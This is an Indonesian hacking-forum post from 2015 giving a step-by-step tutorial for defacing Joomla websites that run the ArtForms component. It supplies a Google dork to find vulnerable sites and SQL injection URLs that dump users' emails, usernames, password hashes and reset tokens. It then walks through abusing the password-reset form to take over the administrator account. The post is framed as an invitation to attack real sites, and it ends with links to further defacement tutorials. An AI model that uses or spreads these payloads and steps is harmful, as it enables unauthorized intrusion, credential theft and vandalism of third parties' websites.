How To Deface With Joomla Artform

Subyek: How To Deface With Joomla Artform Wed Jun 10, 2015 10:47 pm

Hello Probolinggo Cyber Crew :3
Meet Again With Mr.XSecr3t
Now .. let's Try To Deface With Joomla Artform

Noobs Or Pro ... That Is Same Bro ~
Let's Studying How To Deface With Joomla Artform

Bahan Bahan :
Dork mah pasti bro :3
Dork nih : inurl:"option com_artforms site:id/uk/com/org bebas ~ dikembangin lagi juga bisa :3

Kalau udah ke google dan nemuin target .. pastikan targetnya ada Terusan Link option=com_artform :3
terus Klik Target nya ~
kalau udah ke halaman indexnya ... Exploit dengan ini
/index.php?option=com_artforms&task=vferforms&id=1+UNION+SELECT+1,2,3,version(),5,concat_ws(email,0x3a,username,0x3a,password)+from+jos_users--
NB* biasanya kalau VULN itu langsung ke Tempat Register Formnya :3
Naah kalau udah gitu pasti keluar Email dan semacam default Hash gitu
contohnya kya gni : webmin@clueslibs.orgexecwebmin@clueslibs.org:webmin@clueslibs.org342d60be9d8775ba642d7a0c4b5393ff:f7BYbV5VgO5eS <<< nah berarti vuln trus di copas tuh ke Notepad buka notepad lalu copas di notepad kalau udah diemin dlu aja

dan kalau udah gitu buka Tab Baru ya Mastah Smile

terus kita seakan2 lupa password adminnya
exploitnya dengan ...
/index.php?option=com_user&view=reset
jadinya http://www.targetkalian.com/index.php?option=com_user&view=reset
maka kita akan disuruh masukkan Email :3
kembali lagi ke Notepad tadi mastah Smile

copy kan emailnya semisal webmin@clueslibs.org nah pakai itu Email lalu masukkan ke dalam kolomnya ..
lalu tekan Enter ...
kalau udah ... tinggalin dlu aja :3
buka tab lagi yak Smile

buka tab mulu ga bosen yak ? wokwokwokw :v :v :v
kalau dah Exploit lagi pakai ini :
/index.php?option=com_artforms&task=vferforms&id=1+UNION+SELECT+1,2,3,version(),5,concat_ws(username,0x3a,activation)+from+jos_users

jadinya http://www.targetkalian.com/index.php?option=com_artforms&task=vferforms&id=1+UNION+SELECT+1,2,3,version(),5,concat_ws(username,0x3a,activation)+from+jos_users
gunanya exploit ini agar kita tau Berapa Tokennya karena kita ga bisa akses email adminnya kan ?? :v wakakakka ... :v :v kalau bisa ngpain repot2 exploit2 tong :troll: :troll:
nah kalau udah di enter langsung tuh keliatan ditengah2 index .
ada semacam username dan tokennya
semisal adminexec553e566367:$1235 nah itu yang HASH nya adalah Token buat reset password tong :v :v
kalau udah .. kembali lagi deh ke form lupa password tadi
masukkan tokennya jadi tokennya adalah
exec553e566367:$1235 (tinggalkan adminnya untuk usernamenya :3 )
kalau udah gitu tekan ENTER !!
kalau udah ENTER succes deh tinggal Masukkan PASSWORD admin yang di inginkan :3
kalau udah pergi deh ke administratornya
jadi http://www.targetkita.com/administrator/ :3 masukkan username dan password yang tadi udah diganti Smile

Kalau Succes Masuk ke dashboard lol!

Okee Sekian TUTOR dari ane yak
kurang lebihnya bisa tanya lagi ... :3 COMENT AJA BROOO~

Thank's For Look this POST bounce

Subyek: Re: How To Deface With Joomla Artform Wed Aug 26, 2015 4:57 pm

» Deface Forum Sederhana ~ By Mr.XSecr3t
» How To Deface Blogspot !
» Deface Dengan eLFinder
» Deface Dengan SQLMAP Python27
» Deface Dengan Uber Upload